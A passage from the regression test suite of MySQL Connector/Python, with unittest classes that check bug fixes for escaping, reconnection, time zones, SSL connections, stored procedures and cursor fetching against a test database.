cur.execute("DROP TABLE IF EXISTS {table}".format(table=self.tbl))
cur.execute(
("CREATE TABLE {table} (id INT AUTO_INCREMENT KEY, "
"c1 VARCHAR(100) DEFAULT 'abcabcabcabcabcabcabcabcabcabc') "
"ENGINE=INNODB").format(table=self.tbl)
)
insert = "INSERT INTO {table} (id) VALUES (%s)".format(table=self.tbl)
exp = 20000
cur.executemany(insert, [(None,)] * exp)
self.cnx.commit()
cur.execute(
'SELECT * FROM {table} LIMIT 20000'.format(table=self.tbl))
try:
rows = cur.fetchall()
except errors.Error as err:
self.fail("Failed retrieving big result set: {0}".format(err))
else:
self.assertEqual(exp, cur.rowcount)
self.assertEqual(exp, len(rows))
class Bug675425(tests.MySQLConnectorTests):
"""lp: 675425: Problems with apostrophe"""
def setUp(self):
self.tbl = 'Bug675425'
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
cnx.close()
@foreach_cnx()
def test_executemany_escape(self):
cur = self.cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
cur.execute("CREATE TABLE {0} (c1 VARCHAR(30),"
" c2 VARCHAR(30))".format(self.tbl))
data = [
("ham", "spam",),
("spam", "ham",),
("ham \\' spam", "spam ' ham",)
]
sql = "INSERT INTO {0} VALUES (%s, %s)".format(self.tbl)
try:
cur.executemany(sql, data)
except Exception as exc:
self.fail(str(exc))
self.cnx.close()
class Bug695514(tests.MySQLConnectorTests):
"""lp: 695514: Infinite recursion when setting connection client_flags"""
@foreach_cnx()
def test_client_flags(self):
try:
config = tests.get_mysql_config()
config['connection_timeout'] = 2
config['client_flags'] = constants.ClientFlag.get_default()
self.cnx = self.cnx.__class__(**config)
except:
self.fail("Failed setting client_flags using integer")
class Bug809033(tests.MySQLConnectorTests):
"""lp: 809033: Lost connection causes infinite loop"""
def setUp(self):
self.table_name = 'Bug809033'
def _setup(self):
self.cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.table_name))
table = (
"CREATE TABLE {table} ("
" id INT UNSIGNED NOT NULL AUTO_INCREMENT,"
" c1 VARCHAR(255) DEFAULT '{default}',"
" PRIMARY KEY (id)"
")"
).format(table=self.table_name, default='a' * 255)
self.cnx.cmd_query(table)
stmt = "INSERT INTO {table} (id) VALUES {values}".format(
table=self.table_name,
values=','.join(['(NULL)'] * 1024)
)
self.cnx.cmd_query(stmt)
def tearDown(self):
try:
cnx = connection.MySQLConnection(**tests.get_mysql_config())
cnx.cmd_query(
"DROP TABLE IF EXISTS {0}".format(self.table_name))
cnx.close()
except:
pass
@foreach_cnx()
def test_lost_connection(self):
self._setup()
def kill(connection_id):
"""Kill connection using separate connection"""
killer = connection.MySQLConnection(**tests.get_mysql_config())
time.sleep(1)
killer.cmd_query("KILL {0}".format(connection_id))
killer.close()
def sleepy_select(cnx):
"""Execute a SELECT statement which takes a while to complete"""
cur = cnx.cursor()
# Ugly query ahead!
stmt = "SELECT x1.*, x2.* from {table} as x1, {table} as x2".format(
table=self.table_name)
cur.execute(stmt)
# Save the error so we can check in the calling thread
cnx.test_error = None
try:
cur.fetchall()
except errors.Error as err:
cnx.test_error = err
worker = Thread(target=sleepy_select, args=[self.cnx])
killer = Thread(target=kill, args=[self.cnx.connection_id])
worker.start()
killer.start()
worker.join()
killer.join()
self.assertTrue(
isinstance(self.cnx.test_error,
(errors.InterfaceError, errors.OperationalError))
)
self.cnx.close()
class Bug865859(tests.MySQLConnectorTests):
"""lp: 865859: sock.recv fails to return in some cases (infinite wait)"""
def setUp(self):
self.table_name = 'Bug865859'
@cnx_config(connection_timeout=1)
@foreach_cnx()
def test_reassign_connection(self):
cur = self.cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.table_name))
cur.execute("CREATE TABLE {0} (c1 INT)".format(self.table_name))
cur.execute("INSERT INTO {0} (c1) VALUES (1)".format(self.table_name))
try:
# We create a new cnx, replacing current
self.cnx = self.cnx.__class__(**self.config)
cur = self.cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.table_name))
except errors.InterfaceError as err:
self.fail(
"Connection was not closed, we got timeout: {0}".format(err))
else:
cur.close()
self.cnx.close()
class BugOra13395083(tests.MySQLConnectorTests):
"""BUG#13395083: Using time zones"""
def setUp(self):
self.table_name = 'BugOra13395083'
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.table_name))
@cnx_config(time_zone="+00:00")
@foreach_cnx()
def test_time_zone(self):
utc = tests.UTCTimeZone()
testzone = tests.TestTimeZone(+2)
# Store a datetime in UTC into a TIMESTAMP column
now_utc = datetime.utcnow().replace(microsecond=0, tzinfo=utc)
cur = self.cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.table_name))
cur.execute("CREATE TABLE {0} (c1 TIMESTAMP)".format(self.table_name))
cur.execute(
"INSERT INTO {0} (c1) VALUES (%s)".format(self.table_name),
(now_utc,))
self.cnx.commit()
cur.execute("SELECT c1 FROM {0}".format(self.table_name))
row = cur.fetchone()
self.assertEqual(now_utc, row[0].replace(tzinfo=utc))
self.cnx.time_zone = "+02:00"
cur.execute("SELECT c1 FROM {0}".format(self.table_name))
row = cur.fetchone()
self.assertEqual(now_utc.astimezone(testzone),
row[0].replace(tzinfo=testzone))
self.cnx.close()
class BugOra13392739(tests.MySQLConnectorTests):
"""BUG#13392739: MySQLConnection.ping()"""
@cnx_config(connection_timeout=2, unix_socket=None)
@foreach_cnx()
def test_ping(self):
cnx = self.cnx.__class__()
self.assertRaises(errors.InterfaceError, cnx.ping)
try:
self.cnx.ping()
except Exception as e:
self.fail("Error raised although connection should be "
"available (%s)." % e)
self.cnx.close()
self.assertRaises(errors.InterfaceError, self.cnx.ping)
try:
self.cnx.ping(reconnect=True)
except Exception as e:
self.fail("Error raised although ping should reconnect. (%s)" % e)
# Temper with the host to which we reconnect to simulate the
# MySQL not being available.
self.cnx.disconnect()
self.cnx._host = 'some-unknown-host-somwhere-on.mars'
self.assertRaises(errors.InterfaceError, self.cnx.ping, reconnect=True)
@cnx_config(connection_timeout=2, unix_socket=None)
@foreach_cnx()
def test_reconnect(self):
self.cnx.disconnect()
self.assertRaises(errors.InterfaceError, self.cnx.ping)
try:
self.cnx.reconnect()
except:
self.fail("Errors raised although connection should have been "
"reconnected.")
self.cnx.disconnect()
# Temper with the host to which we reconnect to simulate the
# MySQL not being available.
self.cnx._host = 'some-unknown-host-somwhere-on-mars.example.com'
self.assertRaises(errors.InterfaceError, self.cnx.reconnect)
try:
self.cnx.reconnect(attempts=3)
except errors.InterfaceError as exc:
self.assertTrue('3 attempt(s)' in str(exc))
@unittest.skipIf(sys.version_info < (3, 5), "Objects not collected by GC.")
class BugOra13435186(tests.MySQLConnectorTests):
def setUp(self):
self.sample_size = 100
self.tolerate = 5
self._reset_samples()
self.samples = [0, ] * self.sample_size
gc.collect()
def _reset_samples(self):
self.samples = [0, ] * self.sample_size
def _assert_flat_line(self, samples):
counters = {}
for value in samples:
try:
counters[value] = counters[value] + 1
except KeyError:
counters[value] = 1
if len(counters) > self.tolerate:
self.fail("Counters {} of collected object higher than tolerated."
"".format(len(counters)))
def test_converter(self):
for i in range(0, self.sample_size):
conversion.MySQLConverter()
self.samples[i] = len(gc.get_objects())
self._assert_flat_line(self.samples)
@foreach_cnx()
def test_connection(self):
# Create a connection and close using close()-method
for i in range(0, self.sample_size):
cnx = self.cnx.__class__(**self.config)
cnx.close()
self.samples[i] = len(gc.get_objects())
self._assert_flat_line(self.samples)
self._reset_samples()
# Create a connection and rely on destructor to close
for i in range(0, self.sample_size):
cnx = self.cnx.__class__(**self.config)
self.samples[i] = len(gc.get_objects())
self._assert_flat_line(self.samples)
@foreach_cnx()
def test_cursor(self):
# Create a cursor and close using close()-method
for i in range(0, self.sample_size):
cursor = self.cnx.cursor()
cursor.close()
self.samples[i] = len(gc.get_objects())
self._assert_flat_line(self.samples)
self._reset_samples()
# Create a cursor and rely on destructor to close
for i in range(0, self.sample_size):
cursor = self.cnx.cursor()
self.samples[i] = len(gc.get_objects())
self._assert_flat_line(self.samples)
class BugOra14184643(tests.MySQLConnectorTests):
"""BUG#14184643: cmd_query() disregards waiting results"""
@foreach_cnx()
def test_cmd_query(self):
self.cnx.cmd_query('SELECT 1')
self.assertRaises(errors.InternalError, self.cnx.cmd_query,
'SELECT 2')
@foreach_cnx(connection.MySQLConnection)
def test_get_rows(self):
self.cnx.cmd_query('SELECT 1')
self.cnx.get_rows()
self.assertRaises(errors.InternalError, self.cnx.get_rows)
self.cnx.cmd_query('SELECT 1')
self.cnx.get_row()
self.assertEqual(None, self.cnx.get_row()[0])
self.assertRaises(errors.InternalError, self.cnx.get_row)
@unittest.skipIf(not CMySQLConnection, ERR_NO_CEXT)
@foreach_cnx(CMySQLConnection)
def test_get_rows(self):
self.cnx.cmd_query('SELECT 1')
while True:
self.cnx.get_rows()
if not self.cnx.next_result():
break
else:
self.fail("Found multiple results where only 1 was expected")
self.assertRaises(errors.InternalError, self.cnx.get_rows)
@foreach_cnx()
def test_cmd_statistics(self):
self.cnx.cmd_query('SELECT 1')
self.assertRaises(errors.InternalError, self.cnx.cmd_statistics)
self.cnx.get_rows()
class BugOra14208326(tests.MySQLConnectorTests):
"""BUG#14208326: cmd_query() does not handle multiple statements"""
def setUp(self):
self.table = "BugOra14208326"
def _setup(self):
self.cnx.cmd_query("DROP TABLE IF EXISTS %s" % self.table)
self.cnx.cmd_query("CREATE TABLE %s (id INT)" % self.table)
def tearDown(self):
config = tests.get_mysql_config()
self.cnx = connection.MySQLConnection(**config)
self.cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.table))
@foreach_cnx(connection.MySQLConnection)
def test_cmd_query(self):
self._setup()
self.assertRaises(errors.InterfaceError,
self.cnx.cmd_query, 'SELECT 1; SELECT 2')
@unittest.skipIf(not CMySQLConnection, ERR_NO_CEXT)
@foreach_cnx(CMySQLConnection)
def test_cmd_query_iter(self):
self._setup()
stmt = 'SELECT 1; INSERT INTO %s VALUES (1),(2); SELECT 3'
results = []
try:
for result in self.cnx.cmd_query_iter(stmt % self.table):
results.append(result)
if 'columns' in result:
results.append(self.cnx.get_rows())
except NotImplementedError:
# Some cnx are not implementing this
if not isinstance(self.cnx, CMySQLConnection):
raise
class BugOra14201459(tests.MySQLConnectorTests):
"""BUG#14201459: Server error 1426 should raise ProgrammingError"""
def setUp(self):
self.tbl = 'Bug14201459'
def tearDown(self):
config = tests.get_mysql_config()
self.cnx = connection.MySQLConnection(**config)
self._setup()
def _setup(self):
self.cnx.cmd_query("DROP TABLE IF EXISTS %s" % (self.tbl))
@foreach_cnx()
def test_error1426(self):
cur = self.cnx.cursor()
self._setup()
create = "CREATE TABLE %s (c1 TIME(7))" % self.tbl
try:
cur.execute(create)
except errors.ProgrammingError as exception:
if tests.MYSQL_VERSION < (5, 6, 4) and exception.errno != 1064:
self.fail("ProgrammingError is not Error 1064")
elif tests.MYSQL_VERSION >= (5, 6, 4) and exception.errno != 1426:
self.fail("ProgrammingError is not Error 1426")
else:
self.fail("ProgrammingError not raised")
class BugOra14231160(tests.MySQLConnectorTests):
"""BUG#14231160: lastrowid, description and rowcount read-only"""
@foreach_cnx()
def test_readonly_properties(self):
cur = self.cnx.cursor()
for attr in ('description', 'rowcount', 'lastrowid'):
try:
setattr(cur, attr, 'spam')
except AttributeError:
# It's readonly, that's OK
pass
else:
self.fail('Need read-only property: {0}'.format(attr))
class BugOra14259954(tests.MySQLConnectorTests):
"""BUG#14259954: ON DUPLICATE KEY UPDATE VALUE FAILS REGEX"""
def setUp(self):
self.tbl = 'Bug14259954'
def _setup(self):
cur = self.cnx.cursor()
cur.execute("DROP TABLE IF EXISTS %s" % (self.tbl))
create = ("CREATE TABLE %s ( "
"`id` int(11) NOT NULL AUTO_INCREMENT, "
"`c1` int(11) NOT NULL DEFAULT '0', "
"PRIMARY KEY (`id`,`c1`))" % (self.tbl))
cur.execute(create)
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
@foreach_cnx()
def test_executemany(self):
self._setup()
cur = self.cnx.cursor()
query = ("INSERT INTO %s (id,c1) VALUES (%%s,%%s) "
"ON DUPLICATE KEY UPDATE c1=VALUES(c1)") % self.tbl
try:
cur.executemany(query, [(1, 1), (2, 2)])
except errors.ProgrammingError as err:
self.fail("Regular expression fails with executemany(): %s" %
err)
class BugOra14548043(tests.MySQLConnectorTests):
"""BUG#14548043: ERROR MESSAGE SHOULD BE IMPROVED TO DIAGNOSE THE PROBLEM
"""
@foreach_cnx()
def test_unix_socket(self):
config = self.config.copy()
config['unix_socket'] = os.path.join(
tempfile.gettempdir(), 'a' * 100 + 'myconnpy_bug14548043.test')
try:
cnx = self.cnx.__class__(**config)
except errors.InterfaceError as exc:
self.assertEqual(2002, exc.errno)
class BugOra14754894(tests.MySQLConnectorTests):
"""
"""
def setUp(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
self.tbl = 'BugOra14754894'
cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.tbl))
cnx.cmd_query("CREATE TABLE {0} (c1 INT)".format(self.tbl))
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cnx.cmd_query("DROP TABLE IF EXISTS %s" % (self.tbl))
@foreach_cnx()
def test_executemany(self):
self.cnx.cmd_query("TRUNCATE TABLE {0}".format(self.tbl))
cur = self.cnx.cursor()
insert = "INSERT INTO {0} (c1) VALUES (%(c1)s)".format(self.tbl)
data = [{'c1': 1}]
try:
cur.executemany(insert, [{'c1': 1}])
except ValueError as err:
self.fail(err)
cur.execute("SELECT c1 FROM %s" % self.tbl)
self.assertEqual(data[0]['c1'], cur.fetchone()[0])
cur.close()
@unittest.skipIf(not tests.IPV6_AVAILABLE, "IPv6 testing disabled")
class BugOra15876886(tests.MySQLConnectorTests):
"""BUG#15876886: CONNECTOR/PYTHON CAN NOT CONNECT TO MYSQL THROUGH IPV6
"""
@foreach_cnx()
def test_ipv6(self):
config = self.config.copy()
config['host'] = '::1'
config['unix_socket'] = None
try:
cnx = self.cnx.__class__(**config)
except errors.InterfaceError as err:
self.fail("Can not connect using IPv6: {0}".format(str(err)))
else:
cnx.close()
class BugOra15915243(tests.MySQLConnectorTests):
"""BUG#15915243: PING COMMAND ALWAYS RECONNECTS TO THE DATABASE
"""
@foreach_cnx()
def test_ping(self):
cid = self.cnx.connection_id
self.cnx.ping()
# Do not reconnect
self.assertEqual(cid, self.cnx.connection_id)
self.cnx.close()
# Do not reconnect
self.assertRaises(errors.InterfaceError, self.cnx.ping)
# Do reconnect
self.cnx.ping(reconnect=True)
self.assertNotEqual(cid, self.cnx.connection_id)
self.cnx.close()
class BugOra15916486(tests.MySQLConnectorTests):
"""BUG#15916486: RESULTS AFTER STORED PROCEDURE WITH ARGUMENTS ARE NOT KEPT
"""
def setUp(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP PROCEDURE IF EXISTS sp1")
cur.execute("DROP PROCEDURE IF EXISTS sp2")
sp1 = ("CREATE PROCEDURE sp1(IN pIn INT, OUT pOut INT)"
" BEGIN SELECT 1; SET pOut := pIn; SELECT 2; END")
sp2 = ("CREATE PROCEDURE sp2 ()"
" BEGIN SELECT 1; SELECT 2; END")
cur.execute(sp1)
cur.execute(sp2)
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
try:
cur.execute("DROP PROCEDURE IF EXISTS sp1")
cur.execute("DROP PROCEDURE IF EXISTS sp2")
except:
pass # Clean up fail is acceptable for this test
cnx.close()
@foreach_cnx()
def test_callproc_with_args(self):
cur = self.cnx.cursor()
exp = (5, 5)
self.assertEqual(exp, cur.callproc('sp1', (5, 0)))
exp = [[(1,)], [(2,)]]
results = []
for result in cur.stored_results():
results.append(result.fetchall())
self.assertEqual(exp, results)
@foreach_cnx()
def test_callproc_without_args(self):
cur = self.cnx.cursor()
exp = ()
self.assertEqual(exp, cur.callproc('sp2'))
exp = [[(1,)], [(2,)]]
results = []
for result in cur.stored_results():
results.append(result.fetchall())
self.assertEqual(exp, results)
@unittest.skipIf(os.name == 'nt',
"Cannot test error handling when doing handshake on Windows")
@unittest.skipIf(tests.MYSQL_VERSION > (8, 0, 4),
"Revoked users can no more grant")
class BugOra15836979(tests.MySQLConnectorTests):
"""BUG#15836979: UNCLEAR ERROR MESSAGE CONNECTING USING UNALLOWED IP ADDRESS
"""
def setUp(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cnx.cmd_query("DROP USER 'root'@'127.0.0.1'")
try:
cnx.cmd_query("DROP USER 'root'@'::1'")
except errors.DatabaseError:
# Some MySQL servers have no IPv6 entry
pass
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cnx.cmd_query(
"GRANT ALL PRIVILEGES ON *.* TO 'root'@'127.0.0.1' "
"WITH GRANT OPTION")
cnx.cmd_query(
"GRANT ALL PRIVILEGES ON *.* TO 'root'@'::1' "
"WITH GRANT OPTION")
cnx.close()
@foreach_cnx()
def test_handshake(self):
config = self.config.copy()
config['host'] = '127.0.0.1'
config['unix_socket'] = None
try:
self.cnx.__class__(**config)
except errors.Error as exc:
self.assertTrue(
'Access denied' in str(exc) or 'not allowed' in str(exc),
'Wrong error message, was: {0}'.format(str(exc)))
class BugOra16217743(tests.MySQLConnectorTests):
"""BUG#16217743: CALLPROC FUNCTION WITH STRING PARAMETERS
"""
def setUp(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cnx.cmd_query("DROP TABLE IF EXISTS bug16217743")
cnx.cmd_query("DROP PROCEDURE IF EXISTS sp_bug16217743")
cnx.cmd_query("CREATE TABLE bug16217743 (c1 VARCHAR(20), c2 INT)")
cnx.cmd_query(
"CREATE PROCEDURE sp_bug16217743 (p1 VARCHAR(20), p2 INT) "
"BEGIN INSERT INTO bug16217743 (c1, c2) "
"VALUES (p1, p2); END;")
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cnx.cmd_query("DROP TABLE IF EXISTS bug16217743")
cnx.cmd_query("DROP PROCEDURE IF EXISTS sp_bug16217743")
@foreach_cnx()
def test_procedure(self):
exp = ('ham', 42)
cur = self.cnx.cursor()
cur.callproc('sp_bug16217743', ('ham', 42))
cur.execute("SELECT c1, c2 FROM bug16217743")
self.assertEqual(exp, cur.fetchone())
@unittest.skipIf(not tests.SSL_AVAILABLE,
"BugOra16217667 test failed. Python lacks SSL support.")
class BugOra16217667(tests.MySQLConnectorTests):
"""BUG#16217667: PYTHON CONNECTOR 3.2 SSL CONNECTION FAILS
"""
def setUp(self):
config = tests.get_mysql_config()
self.admin_cnx = connection.MySQLConnection(**config)
self.admin_cnx.cmd_query(
"CREATE USER 'ssluser'@'{host}'".format(
db=config['database'], host=tests.get_mysql_config()['host']))
if tests.MYSQL_VERSION < (5, 7, 21):
self.admin_cnx.cmd_query(
"GRANT ALL ON {db}.* TO 'ssluser'@'{host}' REQUIRE X509"
"".format(db=config['database'],
host=tests.get_mysql_config()['host']))
else:
self.admin_cnx.cmd_query(
"GRANT ALL ON {db}.* TO 'ssluser'@'{host}'"
"".format(db=config['database'],
host=tests.get_mysql_config()['host']))
self.admin_cnx.cmd_query(
"ALTER USER 'ssluser'@'{host}' REQUIRE X509"
"".format(db=config['database'],
host=tests.get_mysql_config()['host']))
def tearDown(self):
self.admin_cnx.cmd_query("DROP USER 'ssluser'@'{0}'".format(
tests.get_mysql_config()['host']))
@foreach_cnx()
def test_sslauth(self):
config = self.config.copy()
config['user'] = 'ssluser'
config['password'] = ''
config['unix_socket']= None
config['ssl_verify_cert'] = True
config.update({
'ssl_ca': os.path.abspath(
os.path.join(tests.SSL_DIR, 'tests_CA_cert.pem')),
'ssl_cert': os.path.abspath(
os.path.join(tests.SSL_DIR, 'tests_client_cert.pem')),
'ssl_key': os.path.abspath(
os.path.join(tests.SSL_DIR, 'tests_client_key.pem')),
})
try:
self.cnx = self.cnx.__class__(**config)
except errors.Error as exc:
self.assertTrue('ssl' in str(exc).lower(), str(exc))
self.cnx.cmd_query("SHOW STATUS LIKE 'Ssl_cipher'")
self.assertTrue(self.cnx.get_rows()[0][0] != '')
@unittest.skipIf(not tests.SSL_AVAILABLE,
"BugOra16316049 test failed. Python lacks SSL support.")
class BugOra16316049(tests.MySQLConnectorTests):
""" SSL ERROR: [SSL: TLSV1_ALERT_UNKNOWN_CA] AFTER FIX 6217667"""
def setUp(self):
config = tests.get_mysql_config()
self.host = config['host']
cnx = connection.MySQLConnection(**config)
if tests.MYSQL_VERSION < (5, 7, 21):
cnx.cmd_query(
"GRANT ALL ON {db}.* TO 'ssluser'@'{host}' REQUIRE SSL".format(
db=config['database'], host=tests.get_mysql_config()['host']))
else:
cnx.cmd_query(
"CREATE USER 'ssluser'@'{host}'".format(
db=config['database'],
host=tests.get_mysql_config()['host']))
cnx.cmd_query(
"GRANT ALL ON {db}.* TO 'ssluser'@'{host}'".format(
db=config['database'],
host=tests.get_mysql_config()['host']))
cnx.cmd_query(
"ALTER USER 'ssluser'@'{host}' REQUIRE SSL".format(
db=config['database'],
host=tests.get_mysql_config()['host']))
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cnx.cmd_query("DROP USER 'ssluser'@'{host}'".format(host=self.host))
cnx.close()
@foreach_cnx()
def test_ssl(self):
ssl_ca = os.path.abspath(
os.path.join(tests.SSL_DIR, 'tests_CA_cert.pem'))
ssl_cert = os.path.abspath(
os.path.join(tests.SSL_DIR, 'tests_client_cert.pem'))
ssl_key = os.path.abspath(
os.path.join(tests.SSL_DIR, 'tests_client_key.pem'))
config = self.config.copy()
config.update({
'ssl_ca': None,
'ssl_cert': None,
'ssl_key': None,
})
# Use wrong value for ssl_ca
config['user'] = 'ssluser'
config['password'] = ''
config['unix_socket']= None
config['ssl_ca'] = os.path.abspath(
os.path.join(tests.SSL_DIR, 'tests_casdfasdfdsaa_cert.pem'))
config['ssl_cert'] = ssl_cert
config['ssl_key'] = ssl_key
config['ssl_verify_cert'] = True
# An Exception should be raised
try:
self.cnx.__class__(**config)
except errors.Error as exc:
exc_str = str(exc).lower()
self.assertTrue('ssl' in exc_str or 'no such file' in exc_str)
# Use correct value
config['ssl_ca'] = ssl_ca
config['host'] = 'localhost' # common name must be equal
try:
self.cnx = self.cnx.__class__(**config)
except errors.Error as exc:
if exc.errno == 1045 and ':' not in self.host:
# For IPv4
self.fail("Auth failed:" + str(exc))
if ':' in self.host:
# Special case for IPv6
config['ssl_verify_cert'] = False
config['host'] = self.host
try:
self.cnx = self.cnx.__class__(**config)
except errors.Error as exc:
if exc.errno == 1045 and not tests.IPV6_AVAILABLE:
self.fail("Auth failed:" + str(exc))
self.cnx.cmd_query("SHOW STATUS LIKE 'Ssl_cipher'")
self.assertTrue(self.cnx.get_rows()[0][0] != '')
class BugOra16662920(tests.MySQLConnectorTests):
"""BUG#16662920: FETCHALL() IGNORES NEXT_ROW FOR BUFFERED CURSORS
"""
def setUp(self):
self.tbl = 'BugOra16662920'
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
cur.execute(
"CREATE TABLE {0} (id INT AUTO_INCREMENT, c1 VARCHAR(20), "
"PRIMARY KEY (id)) ENGINE=InnoDB".format(self.tbl)
)
data = [('a',), ('c',), ('e',), ('d',), ('g',), ('f',)]
cur.executemany("INSERT INTO {0} (c1) VALUES (%s)".format(self.tbl),
data)
cur.close()
cnx.commit()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
cnx.close()
@foreach_cnx()
def test_buffered(self):
cur = self.cnx.cursor(buffered=True)
cur.execute("SELECT * FROM {0} ORDER BY c1".format(self.tbl))
self.assertEqual((1, 'a'), cur.fetchone())
exp = [(2, 'c'), (4, 'd'), (3, 'e')]
self.assertEqual(exp, cur.fetchmany(3))
exp = [(6, 'f'), (5, 'g')]
self.assertEqual(exp, cur.fetchall())
cur.close()
@foreach_cnx()
def test_buffered_raw(self):
cur = self.cnx.cursor(buffered=True, raw=True)
cur.execute("SELECT * FROM {0} ORDER BY c1".format(self.tbl))
exp_one = (b'1', b'a')
exp_many = [(b'2', b'c'), (b'4', b'd'), (b'3', b'e')]
exp_all = [(b'6', b'f'), (b'5', b'g')]
self.assertEqual(exp_one, cur.fetchone())
self.assertEqual(exp_many, cur.fetchmany(3))
self.assertEqual(exp_all, cur.fetchall())
cur.close()
class BugOra17041412(tests.MySQLConnectorTests):
"""BUG#17041412: FETCHALL() DOES NOT RETURN SELF._NEXTROW IF AVAILABLE
"""
def setUp(self):
self.table_name = 'BugOra17041412'
self.data = [(1,), (2,), (3,)]
self.data_raw = [(b'1',), (b'2',), (b'3',)]
def _setup(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS %s" % self.table_name)
cur.execute("CREATE TABLE %s (c1 INT)" % self.table_name)
cur.executemany(
"INSERT INTO %s (c1) VALUES (%%s)" % self.table_name,
self.data)
cnx.commit()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS %s" % self.table_name)
@foreach_cnx()
def test_one_all(self):
self._setup()
cur = self.cnx.cursor()
cur.execute("SELECT * FROM %s ORDER BY c1" % self.table_name)
self.assertEqual(self.data[0], cur.fetchone())
self.assertEqual(1, cur.rowcount)
self.assertEqual(self.data[1:], cur.fetchall())
self.assertEqual(3, cur.rowcount)
@foreach_cnx()
def test_many_all(self):
self._setup()
cur = self.cnx.cursor()
cur.execute("SELECT * FROM %s ORDER BY c1" % self.table_name)
self.assertEqual(self.data[0:2], cur.fetchmany(2))
self.assertEqual(2, cur.rowcount)
self.assertEqual(self.data[2:], cur.fetchall())
self.assertEqual(3, cur.rowcount)
@foreach_cnx()
def test_many(self):
self._setup()
cur = self.cnx.cursor()
cur.execute("SELECT * FROM %s ORDER BY c1" % self.table_name)
self.assertEqual(self.data, cur.fetchall())
self.assertEqual(3, cur.rowcount)
cur.execute("SELECT * FROM %s WHERE c1 > %%s" % self.table_name,
(self.data[-1][0] + 100,))
self.assertEqual([], cur.fetchall())
@foreach_cnx()
def test_raw_one_all(self):
self._setup()
cur = self.cnx.cursor(raw=True)
cur.execute("SELECT * FROM %s ORDER BY c1" % self.table_name)
self.assertEqual(self.data_raw[0], cur.fetchone())
self.assertEqual(1, cur.rowcount)
self.assertEqual(self.data_raw[1:], cur.fetchall())
self.assertEqual(3, cur.rowcount)
@foreach_cnx()
def test_raw_many_all(self):
self._setup()
cur = self.cnx.cursor(raw=True)
cur.execute("SELECT * FROM %s ORDER BY c1" % self.table_name)
self.assertEqual(self.data_raw[0:2], cur.fetchmany(2))
self.assertEqual(2, cur.rowcount)
self.assertEqual(self.data_raw[2:], cur.fetchall())
self.assertEqual(3, cur.rowcount)
@foreach_cnx()
def test_raw_many(self):
self._setup()
cur = self.cnx.cursor(raw=True)
cur.execute("SELECT * FROM %s ORDER BY c1" % self.table_name)
self.assertEqual(self.data_raw, cur.fetchall())
self.assertEqual(3, cur.rowcount)
cur.execute("SELECT * FROM %s WHERE c1 > 1000" % self.table_name)
self.assertEqual([], cur.fetchall())
class BugOra16819486(tests.MySQLConnectorTests):
"""BUG#16819486: ERROR 1210 TO BE HANDLED
"""
def setUp(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS BugOra16819486")
cur.execute("CREATE TABLE BugOra16819486 (c1 INT, c2 INT)")
cur.executemany("INSERT INTO BugOra16819486 VALUES (%s, %s)",
[(1, 10), (2, 20), (3, 30)])
cnx.commit()
def tearDown(self):
cnx = connection.MySQLConnection(**tests.get_mysql_config())
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS BugOra16819486")
cnx.close()
@foreach_cnx()
def test_error1210(self):
cur = self.cnx.cursor(prepared=True)
prep_stmt = "SELECT * FROM BugOra16819486 WHERE c1 = %s AND c2 = %s"
self.assertRaises(mysql.connector.ProgrammingError,
cur.execute, prep_stmt, (1,))
prep_stmt = "SELECT * FROM BugOra16819486 WHERE c1 = %s AND c2 = %s"
exp = [(1, 10)]
cur.execute(prep_stmt, (1, 10))
self.assertEqual(exp, cur.fetchall())
class BugOra16656621(tests.MySQLConnectorTests):
"""BUG#16656621: IMPOSSIBLE TO ROLLBACK WITH UNREAD RESULTS
"""
def setUp(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS BugOra16656621")
cur.execute(
"CREATE TABLE BugOra16656621 "
"(id INT AUTO_INCREMENT, c1 VARCHAR(20), "
"PRIMARY KEY (id)) ENGINE=InnoDB")
def tearDown(self):
cnx = connection.MySQLConnection(**tests.get_mysql_config())
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS BugOra16656621")
@foreach_cnx()
def test_rollback(self):
cur = self.cnx.cursor()
cur.execute(
